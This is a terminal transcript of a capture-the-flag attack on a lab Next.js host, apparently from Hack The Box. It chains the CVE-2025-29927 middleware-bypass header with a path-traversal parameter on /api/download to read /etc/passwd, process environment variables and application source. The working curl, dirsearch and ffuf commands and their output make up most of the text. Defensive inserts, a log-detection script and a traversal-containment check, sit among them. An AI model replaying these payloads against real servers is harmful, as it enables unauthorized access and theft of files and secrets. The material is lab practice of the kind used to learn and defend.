┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # nmap -d --unprivileged -Pn -sVC --min-rate 200 $IP
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-03 17:57 UTC
PORTS: Using ports open on 0% or more average hosts (TCP:1000, UDP:0, SCTP:0)
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 0
min-rate: 200, max-rate: 0
---------------------------------------------
NSE: Using Lua 5.4.
NSE: Arguments from CLI:
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
mass_rdns: Using DNS server 8.8.8.8
Initiating Connect Scan at 17:57
Scanning previous.htb (10.10.11.83) [1000 ports]
Discovered open port 22/tcp on 10.10.11.83
Discovered open port 80/tcp on 10.10.11.83
Increased max_successful_tryno for 10.10.11.83 to 1 (packet drop)
Increased max_successful_tryno for 10.10.11.83 to 2 (packet drop)
Increasing send delay for 10.10.11.83 from 0 to 5 due to 40 out of 132 dropped probes since last increase.
Increased max_successful_tryno for 10.10.11.83 to 3 (packet drop)
Increasing send delay for 10.10.11.83 from 5 to 10 due to 17 out of 56 dropped probes since last increase.
Increasing send delay for 10.10.11.83 from 10 to 20 due to 18 out of 58 dropped probes since last increase.
Increasing send delay for 10.10.11.83 from 20 to 40 due to 17 out of 56 dropped probes since last increase.
Increasing send delay for 10.10.11.83 from 40 to 80 due to 17 out of 56 dropped probes since last increase.
Increasing send delay for 10.10.11.83 from 80 to 160 due to 17 out of 55 dropped probes since last increase.
Increasing send delay for 10.10.11.83 from 160 to 320 due to 22 out of 73 dropped probes since last increase.
Increased max_successful_tryno for 10.10.11.83 to 4 (packet drop)
Increasing send delay for 10.10.11.83 from 320 to 640 due to max_successful_tryno increase to 4
Increased max_successful_tryno for 10.10.11.83 to 5 (packet drop)
Increasing send delay for 10.10.11.83 from 640 to 1000 due to max_successful_tryno increase to 5
Completed Connect Scan at 17:57, 8.95s elapsed (1000 total ports)
Overall sending rates: 223.30 packets / s.
Initiating Service scan at 17:57
Scanning 2 services on previous.htb (10.10.11.83)
Completed Service scan at 17:57, 6.46s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.83.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:57
NSE: Starting vmware-version against 10.10.11.83:80.
NSE: Starting xmlrpc-methods against 10.10.11.83:80.
NSE: Starting address-info against 10.10.11.83.
NSE: Finished address-info against 10.10.11.83.
NSE: Starting http-ls against 10.10.11.83:80.
NSE: Starting http-webdav-scan against 10.10.11.83:80.
NSE: Starting http-auth against 10.10.11.83:80.
NSE: Starting sshv1 against 10.10.11.83:22.
NSE: Starting http-ntlm-info against 10.10.11.83:80.
NSE: Starting http-svn-enum against 10.10.11.83:80.
NSE: Starting http-trane-info against 10.10.11.83:80.
NSE: Starting hnap-info against 10.10.11.83:80.
NSE: Starting http-svn-info against 10.10.11.83:80.
NSE: Starting ssh-hostkey against 10.10.11.83:22.
NSE: Starting http-robots.txt against 10.10.11.83:80.
NSE: Starting http-title against 10.10.11.83:80.
NSE: Starting https-redirect against 10.10.11.83:80.
NSE: Starting http-cookie-flags against 10.10.11.83:80.
NSE: [http-cookie-flags 10.10.11.83:80] start check of /
NSE: Starting http-cors against 10.10.11.83:80.
NSE: Starting http-favicon against 10.10.11.83:80.
NSE: Starting http-generator against 10.10.11.83:80.
NSE: Starting http-git against 10.10.11.83:80.
NSE: Starting http-methods against 10.10.11.83:80.
NSE: [vmware-version 10.10.11.83:80] Couldn't download file: /sdk
NSE: Finished vmware-version against 10.10.11.83:80.
NSE: Finished xmlrpc-methods against 10.10.11.83:80.
NSE: Finished http-ls against 10.10.11.83:80.
NSE: Finished http-svn-info against 10.10.11.83:80.
NSE: Finished http-git against 10.10.11.83:80.
NSE: Finished http-svn-enum against 10.10.11.83:80.
NSE: [http-trane-info 10.10.11.83:80] HTTP: Host returns proper 404 result.
NSE: [http-methods 10.10.11.83:80] HTTP Status for OPTIONS is 405
NSE: Finished http-robots.txt against 10.10.11.83:80.
NSE: Finished https-redirect against 10.10.11.83:80.
NSE: [hnap-info 10.10.11.83:80] HTTP: Host returns proper 404 result.
NSE: Finished sshv1 against 10.10.11.83:22.
NSE: Finished http-webdav-scan against 10.10.11.83:80.
NSE: Finished http-trane-info against 10.10.11.83:80.
NSE: [http-methods 10.10.11.83:80] Response Code to Random Method is 400
NSE: Finished hnap-info against 10.10.11.83:80.
NSE: Finished http-auth against 10.10.11.83:80.
NSE: Finished http-ntlm-info against 10.10.11.83:80.
NSE: Finished http-title against 10.10.11.83:80.
NSE: [http-cookie-flags 10.10.11.83:80] end check of / : 0 issues found
NSE: Finished http-cookie-flags against 10.10.11.83:80.
NSE: Finished http-generator against 10.10.11.83:80.
NSE: [http-favicon 10.10.11.83:80] No favicon found.
NSE: Finished http-favicon against 10.10.11.83:80.
NSE: Finished http-methods against 10.10.11.83:80.
NSE: Finished http-cors against 10.10.11.83:80.
NSE: Finished ssh-hostkey against 10.10.11.83:22.
Completed NSE at 17:57, 5.91s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:57
NSE: Starting http-server-header against 10.10.11.83:80.
NSE: Finished http-server-header against 10.10.11.83:80.
Completed NSE at 17:57, 0.96s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.01s elapsed
Nmap scan report for previous.htb (10.10.11.83)
Host is up, received user-set (0.20s latency).
Scanned at 2025-09-03 17:57:23 UTC for 22s
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: PreviousJS
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Final times for host: srtt: 202035 rttvar: 3885 to: 217575
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:57
NSE: Starting ssh-hostkey.
NSE: Finished ssh-hostkey.
Completed NSE at 17:57, 0.02s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.01s elapsed
Read from /usr/share/nmap: nmap-protocols nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.07 seconds
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl -I http://previous.htb
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 03 Sep 2025 18:02:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 5493
Connection: keep-alive
X-Powered-By: Next.js
ETag: "17m2fyh3hl048k"
Vary: Accept-Encoding
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # webtech --urls http://previous.htb
Target URL: http://previous.htb
Detected technologies:
- Next.js
- Nginx 1.18.0
- Ubuntu
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl -s "http://previous.htb" | grep -o 'href="[^"]*"' | sort -u
href="/_next/static/css/9a1ff1f4870b5a50.css"
href="mailto:jeremy@previous.htb"
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl -s "http://previous.htb" | grep -o '"buildId":"[^"]*"'
"buildId":"qVDR2cKpRgqCslEh-llk9"
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl -s "http://previous.htb" | grep -oP '(?<=<title data-next-head="">).*?(?=</title>)'
PreviousJS
> Google AI
Recent JavaScript CVEs (2024–2025)
Next.js authorization bypass (CVE-2025-29927)
Vulnerability: A flaw in the Next.js middleware could allow an attacker to bypass critical security checks, including authentication. By manipulating the internal x-middleware-subrequest header, an attacker could skip the middleware layer and access protected routes.
Affected versions: Next.js versions before 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Resolution: Vercel, the developer of Next.js, released patches to fix the vulnerability and provided details in a postmortem report.
> Reference
https://www.offsec.com/blog/cve-2025-29927/
https://securitylabs.datadoghq.com/articles/nextjs-middleware-auth-bypass/
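Detection side of the issue described above, as an added example that is not part of the original session: a parser that flags access-log entries where a client supplied `x-middleware-subrequest` and grades them by whether a middleware-gated route answered. The log format, the protected/public prefixes (inferred from the `/docs/*` sign-in redirects in this transcript) and every sample log line are assumptions constructed for the example.

```python
import re
from collections import defaultdict

# Assumed nginx log_format (not on the page): standard fields plus the header,
# captured through nginx's $http_x_middleware_subrequest variable:
#   log_format mwsub '$remote_addr - - [$time_local] "$request" $status '
#                    '$body_bytes_sent "$http_user_agent" '
#                    'mwsub="$http_x_middleware_subrequest"';
LINE_RE = re.compile(
    r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+) "(?P<ua>[^"]*)" '
    r'mwsub="(?P<mwsub>[^"]*)"$'
)

# Assumption: routes the middleware is meant to gate, and the sign-in routes
# that must stay reachable for anonymous clients.
PROTECTED_PREFIXES = ("/docs", "/api")
PUBLIC_PREFIXES = ("/api/auth/",)
SEVERITY = {"probe": 0, "handler-reached": 1, "bypass-served": 2}

# Constructed sample lines (documentation IP ranges, invented user agents).
SAMPLE_LOG = """\
203.0.113.7 - - [03/Sep/2025:17:35:53 +0000] "GET /docs HTTP/1.1" 200 3120 "scanner (constructed)" mwsub="middleware:middleware:middleware:middleware:middleware"
203.0.113.7 - - [03/Sep/2025:17:35:54 +0000] "GET /docs/swagger.json HTTP/1.1" 200 1042 "scanner (constructed)" mwsub="middleware:middleware:middleware:middleware:middleware"
203.0.113.7 - - [04/Sep/2025:05:31:40 +0000] "GET /api/download?example=a HTTP/1.1" 404 26 "scanner (constructed)" mwsub="middleware:middleware:middleware:middleware:middleware"
203.0.113.7 - - [04/Sep/2025:05:31:41 +0000] "GET /signin HTTP/1.1" 200 3010 "scanner (constructed)" mwsub="middleware:middleware:middleware:middleware:middleware"
198.51.100.20 - - [03/Sep/2025:18:02:26 +0000] "GET /docs/swagger.json HTTP/1.1" 307 51 "curl (constructed)" mwsub="-"
198.51.100.20 - - [03/Sep/2025:18:02:30 +0000] "GET / HTTP/1.1" 200 5493 "browser (constructed)" mwsub="-"
truncated line without the expected fields
"""


def is_protected(path):
    """True when the path falls under a gated prefix and is not a sign-in route."""
    if path.startswith(PUBLIC_PREFIXES):
        return False
    return any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)


def classify(match):
    """Return a finding for a parsed line, or None when the header was absent."""
    value = match["mwsub"]
    if value in ("", "-"):          # nginx logs "-" for an unset variable
        return None
    path = match["target"].split("?", 1)[0]
    status = int(match["status"])
    if not is_protected(path):
        verdict = "probe"           # header sent, but the route is not gated
    elif 200 <= status < 300:
        verdict = "bypass-served"   # gated content was delivered
    elif 300 <= status < 400 or status in (401, 403):
        verdict = "probe"           # still redirected or refused
    else:
        verdict = "handler-reached" # the route handler answered, not the gate
    return {
        "ip": match["ip"], "time": match["ts"], "path": path,
        "status": status, "segments": len(value.split(":")), "verdict": verdict,
    }


def analyze(lines):
    """Return (findings, per-client summary, count of unparsable lines)."""
    findings, unparsed = [], 0
    per_ip = defaultdict(lambda: {"requests": 0, "paths": set(), "worst": "probe"})
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        match = LINE_RE.match(line)
        if match is None:
            unparsed += 1           # surface parser gaps instead of hiding them
            continue
        finding = classify(match)
        if finding is None:
            continue
        findings.append(finding)
        summary = per_ip[finding["ip"]]
        summary["requests"] += 1
        summary["paths"].add(finding["path"])
        if SEVERITY[finding["verdict"]] > SEVERITY[summary["worst"]]:
            summary["worst"] = finding["verdict"]
    return findings, dict(per_ip), unparsed


if __name__ == "__main__":
    found, clients, skipped = analyze(SAMPLE_LOG.splitlines())
    for f in found:
        print(f'{f["verdict"]:<16} {f["ip"]:<14} {f["status"]} {f["path"]}')
    for ip, s in clients.items():
        print(f'{ip}: {s["requests"]} flagged requests, worst={s["worst"]}')
    print(f"unparsable lines: {skipped}")
```

On a reverse proxy such as the nginx seen in this scan, `proxy_set_header x-middleware-subrequest "";` keeps a client-supplied copy of the header from reaching the Next.js backend until the framework is upgraded to a patched release.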
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # dirsearch -u http://previous.htb -H "x-nextjs-data: 1" -H "x-middleware-subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware" -e php,html,js,txt,json,env
_|. _ _ _ _ _ | v0.4.3
(_||| ) (/(_|| (_| )
Extensions: php, html, js, txt, json, env
HTTP method: GET | Threads: 25 | Wordlist size: 11985
Output File: /home/Krypt0n/reports/http_previous.htb/_25-09-03_17-33-09.txt
Target: http://previous.htb/
[17:33:09] Starting:
[17:35:12] 308 - 19B - /axis//happyaxis.jsp -> /axis/happyaxis.jsp
[17:35:12] 308 - 30B - /axis2//axis2-web/HappyAxis.jsp -> /axis2/axis2-web/HappyAxis.jsp
[17:35:12] 308 - 24B - /axis2-web//HappyAxis.jsp -> /axis2-web/HappyAxis.jsp
[17:35:27] 308 - 52B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js -> /Citrix/AccessPlatform/auth/clientscripts/cookies.js
[17:35:53] 200 - 3KB - /docs
[17:35:54] 200 - 1KB - /docs/CHANGELOG.html
[17:35:54] 200 - 1KB - /docs/export-demo.xml
[17:35:54] 200 - 1KB - /docs/swagger.json
[17:35:54] 200 - 1KB - /docs/updating.txt
[17:35:54] 200 - 1KB - /docs/changelog.txt
[17:35:54] 200 - 1KB - /docs/maintenance.txt
[17:36:01] 308 - 42B - /engine/classes/swfupload//swfupload_f9.swf -> /engine/classes/swfupload/swfupload_f9.swf
[17:36:02] 308 - 39B - /engine/classes/swfupload//swfupload.swf -> /engine/classes/swfupload/swfupload.swf
[17:36:07] 308 - 27B - /extjs/resources//charts.swf -> /extjs/resources/charts.swf
[17:36:25] 308 - 37B - /html/js/misc/swfupload//swfupload.swf -> /html/js/misc/swfupload/swfupload.swf
[17:38:46] 200 - 3KB - /signin
Task Completed
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl -H "x-nextjs-data: 1" -H "x-middleware-subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware" http://previous.htb/docs/ | more
/docs
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/ | more
/docs
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/CHANGELOG.html | more
/api/auth/signin?callbackUrl=%2Fdocs%2FCHANGELOG.html
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/export-demo.xml | more
/api/auth/signin?callbackUrl=%2Fdocs%2Fexport-demo.xml
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/swagger.json | more
/api/auth/signin?callbackUrl=%2Fdocs%2Fswagger.json
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/updating.txt | more
/api/auth/signin?callbackUrl=%2Fdocs%2Fupdating.txt
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/changelog.txt | more
/api/auth/signin?callbackUrl=%2Fdocs%2Fchangelog.txt
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/maintenance.txt | more
/api/auth/signin?callbackUrl=%2Fdocs%2Fmaintenance.txt
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # dirsearch -u http://previous.htb/api -H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware'
_|. _ _ _ _ _ | v0.4.3
(_||| ) (/(_|| (_| )
Extensions: php, aspx, jsp, html, js
HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/Krypt0n/reports/http_previous.htb/_api_25-09-04_05-27-44.txt
Target: http://previous.htb/
[05:27:45] Starting: api/
[05:27:57] 308 - 22B - /api/%2e%2e//google.com -> /api/%2E%2E/google.com
[05:29:37] 400 - 64B - /api/auth/login.jsp
[05:29:37] 400 - 64B - /api/auth/admin
[05:29:37] 400 - 64B - /api/auth/adm
[05:29:37] 400 - 64B - /api/auth/login.html
[05:29:38] 400 - 64B - /api/auth/login.aspx
[05:29:38] 400 - 64B - /api/auth/logon
[05:29:38] 400 - 64B - /api/auth/login.js
[05:29:38] 400 - 64B - /api/auth/login
[05:29:38] 400 - 64B - /api/auth/login.php
[05:29:38] 302 - 0B - /api/auth/signin -> /signin?callbackUrl=http%3A%2F%2Flocalhost%3A3000
[05:29:39] 308 - 28B - /api/axis2-web//HappyAxis.jsp -> /api/axis2-web/HappyAxis.jsp
[05:29:39] 308 - 23B - /api/axis//happyaxis.jsp -> /api/axis/happyaxis.jsp
[05:29:40] 308 - 34B - /api/axis2//axis2-web/HappyAxis.jsp -> /api/axis2/axis2-web/HappyAxis.jsp
[05:30:08] 308 - 56B - /api/Citrix//AccessPlatform/auth/clientscripts/cookies.js -> /api/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[05:30:45] 400 - 28B - /api/download
[05:30:54] 308 - 46B - /api/engine/classes/swfupload//swfupload_f9.swf -> /api/engine/classes/swfupload/swfupload_f9.swf
[05:30:54] 308 - 43B - /api/engine/classes/swfupload//swfupload.swf -> /api/engine/classes/swfupload/swfupload.swf
[05:31:00] 308 - 31B - /api/extjs/resources//charts.swf -> /api/extjs/resources/charts.swf
[05:31:24] 308 - 41B - /api/html/js/misc/swfupload//swfupload.swf -> /api/html/js/misc/swfupload/swfupload.swf
Task Completed
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~/Tool # ffuf -u 'http://previous.htb/api/download?FUZZ=a' -w ~/Tool/fuzzDicts/paramDict/AllParam.txt -H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware' -mc all -fw 2 -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ /\ \/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://previous.htb/api/download?FUZZ=a
:: Wordlist : FUZZ: /home/Krypt0n/Tool/fuzzDicts/paramDict/AllParam.txt
:: Header : X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response words: 2
________________________________________________
example [Status: 404, Size: 26, Words: 3, Lines: 1, Duration: 216ms]
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl 'http://previous.htb/api/download?example=aaa' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' -v | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
* Host previous.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.83
* Trying 10.10.11.83:80...
* Connected to previous.htb (10.10.11.83) port 80
* using HTTP/1.x
> GET /api/download?example=aaa HTTP/1.1
> Host: previous.htb
> User-Agent: curl/8.13.0
> Accept: */*
> X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware
>
* Request completely sent off
< HTTP/1.1 404 Not Found
< Server: nginx/1.18.0 (Ubuntu)
< Date: Thu, 04 Sep 2025 05:42:08 GMT
< Content-Type: application/json; charset=utf-8
< Content-Length: 26
< Connection: keep-alive
< ETag: "c8wflmak5q"
< Vary: Accept-Encoding
<
{ [26 bytes data]
100 26 100 26 0 0 52 0 --:--:-- --:--:-- --:--:-- 52
* Connection #0 to host previous.htb left intact
{"error":"File not found"}
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl 'http://previous.htb/api/download?example=../../../../etc/passwd' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' -v | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
* Host previous.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.83
* Trying 10.10.11.83:80...
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
* Connected to previous.htb (10.10.11.83) port 80
* using HTTP/1.x
> GET /api/download?example=../../../../etc/passwd HTTP/1.1
> Host: previous.htb
> User-Agent: curl/8.13.0
> Accept: */*
> X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware
>
* Request completely sent off
< HTTP/1.1 200 OK
< Server: nginx/1.18.0 (Ubuntu)
< Date: Thu, 04 Sep 2025 05:46:17 GMT
< Content-Type: application/zip
< Content-Length: 787
< Connection: keep-alive
< Content-Disposition: attachment; filename=../../../../etc/passwd
< ETag: "41amqg1v4m26j"
<
{ [787 bytes data]
100 787 100 787 0 0 1788 0 --:--:-- --:--:-- --:--:-- 1788
* Connection #0 to host previous.htb left intact
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
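The response above shows the `example` query value resolving outside the intended directory and being echoed into `Content-Disposition`. As an added example (not code from the target application, whose handler the transcript does not show), here is a containment check for such a download parameter in Node.js. The function names, the `examples` directory and the fixture files are assumptions.

```javascript
const fs = require("fs");
const os = require("os");
const path = require("path");

// Assumed vulnerable pattern (the real handler is not shown in the transcript):
// the raw query value is joined onto the base directory, so "../" walks out of it.
function resolveUnsafe(baseDir, name) {
  return path.join(baseDir, name);
}

// Hardened pattern: resolve, follow symlinks, then require the result to stay
// strictly inside baseDir. Returns the real path, or null to refuse the request.
function resolveContained(baseDir, name) {
  if (typeof name !== "string" || name === "" || name.includes("\0")) return null;
  const root = fs.realpathSync(baseDir);
  let real;
  try {
    real = fs.realpathSync(path.resolve(root, name)); // throws if the file is missing
  } catch {
    return null;
  }
  const rel = path.relative(root, real);
  const escapes = rel === ".." || rel.startsWith(".." + path.sep) || path.isAbsolute(rel);
  if (rel === "" || escapes) return null;
  return fs.statSync(real).isFile() ? real : null;
}

// Build the header from the resolved basename, never from the raw parameter.
function dispositionFor(realPath) {
  const safe = path.basename(realPath).replace(/[^A-Za-z0-9._-]/g, "_");
  return `attachment; filename="${safe}"`;
}

// Constructed fixture: an examples directory, a file outside it, and a symlink
// inside the directory that points at the outside file.
function buildFixture() {
  const top = fs.mkdtempSync(path.join(os.tmpdir(), "dl-"));
  const base = path.join(top, "examples");
  fs.mkdirSync(base);
  fs.writeFileSync(path.join(base, "hello-world.ts"), "export {};\n");
  fs.writeFileSync(path.join(top, "secret.env"), "constructed\n");
  fs.symlinkSync(path.join(top, "secret.env"), path.join(base, "link.ts"));
  return { top, base };
}

const fx = buildFixture();
for (const name of ["hello-world.ts", "../secret.env", "../../../../etc/passwd", "link.ts"]) {
  console.log(JSON.stringify(name), "->", resolveContained(fx.base, name));
}
```

The check runs on the real path after symlink resolution, so a link planted inside the directory is refused the same way as a `../` sequence.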
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl 'http://previous.htb/api/download?example=../../../../proc/self/environ' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' --output - | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 216 100 216 0 0 472 0 --:--:-- --:--:-- --:--:-- 472
NODE_VERSION=18.20.8HOSTNAME=0.0.0.0YARN_VERSION=1.22.22SHL
VL=1PORT=3000HOME=/home/nextjsPATH=/usr/local/sbin:/usr/loc
al/bin:/usr/sbin:/usr/bin:/sbin:/binNEXT_TELEMETRY_DISABLED
=1PWD=/appNODE_ENV=production
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl 'http://previous.htb/api/download?example=../../../../app/.next/routes-manifest.json' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' -s | jq .
{
"version": 3,
"pages404": true,
"caseSensitive": false,
"basePath": "",
"redirects": [
{
"source": "/:path+/",
"destination": "/:path+",
"internal": true,
"statusCode": 308,
"regex": "^(?:/((?:[^/]+?)(?:/(?:[^/]+?))*))/$"
}
],
"headers": [],
"dynamicRoutes": [
{
"page": "/api/auth/[...nextauth]",
"regex": "^/api/auth/(.+?)(?:/)?$",
"routeKeys": {
"nxtPnextauth": "nxtPnextauth"
},
"namedRegex": "^/api/auth/(?<nxtPnextauth>.+?)(?:/)?$"
},
{
"page": "/docs/[section]",
"regex": "^/docs/([^/]+?)(?:/)?$",
"routeKeys": {
"nxtPsection": "nxtPsection"
},
"namedRegex": "^/docs/(?<nxtPsection>[^/]+?)(?:/)?$"
}
],
"staticRoutes": [
{
"page": "/",
"regex": "^/(?:/)?$",
"routeKeys": {},
"namedRegex": "^/(?:/)?$"
},
{
"page": "/docs",
"regex": "^/docs(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs(?:/)?$"
},
{
"page": "/docs/components/layout",
"regex": "^/docs/components/layout(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/components/layout(?:/)?$"
},
{
"page": "/docs/components/sidebar",
"regex": "^/docs/components/sidebar(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/components/sidebar(?:/)?$"
},
{
"page": "/docs/content/examples",
"regex": "^/docs/content/examples(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/content/examples(?:/)?$"
},
{
"page": "/docs/content/getting-started",
"regex": "^/docs/content/getting\\-started(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/content/getting\\-started(?:/)?$"
},
{
"page": "/signin",
"regex": "^/signin(?:/)?$",
"routeKeys": {},
"namedRegex": "^/signin(?:/)?$"
}
],
"dataRoutes": [],
"rsc": {
"header": "RSC",
"varyHeader": "RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch",
"prefetchHeader": "Next-Router-Prefetch",
"didPostponeHeader": "x-nextjs-postponed",
"contentTypeHeader": "text/x-component",
"suffix": ".rsc",
"prefetchSuffix": ".prefetch.rsc",
"prefetchSegmentHeader": "Next-Router-Segment-Prefetch",
"prefetchSegmentSuffix": ".segment.rsc",
"prefetchSegmentDirSuffix": ".segments"
},
"rewriteHeaders": {
"pathHeader": "x-nextjs-rewritten-path",
"queryHeader": "x-nextjs-rewritten-query"
},
"rewrites": []
}
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl 'http://previous.htb/api/download?example=../../../../app/.next/server/pages/api/auth/%5B...nextauth%5D.js' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1537 100 1537 0 0 3197 0 --:--:-- --:--:-- --:--:-- 3202
"use strict";(()=>{var e={};e.id=651,e.ids=[651],e.modules=
{3480:(e,n,r)=>{e.exports=r(5600)},5600:e=>{e.exports=requi
re("next/dist/compiled/next-server/pages-api.runtime.prod.j
s")},6435:(e,n)=>{Object.defineProperty(n,"M",{enumerable:!
0,get:function(){return function e(n,r){return r in n?n[r]:
"then"in n&&"function"==typeof n.then?n.then(n=>e(n,r)):"fu
nction"==typeof n&&"default"===r?n:void 0}}})},8667:(e,n)=>
{Object.defineProperty(n,"A",{enumerable:!0,get:function(){
return r}});var r=function(e){return e.PAGES="PAGES",e.PAGE
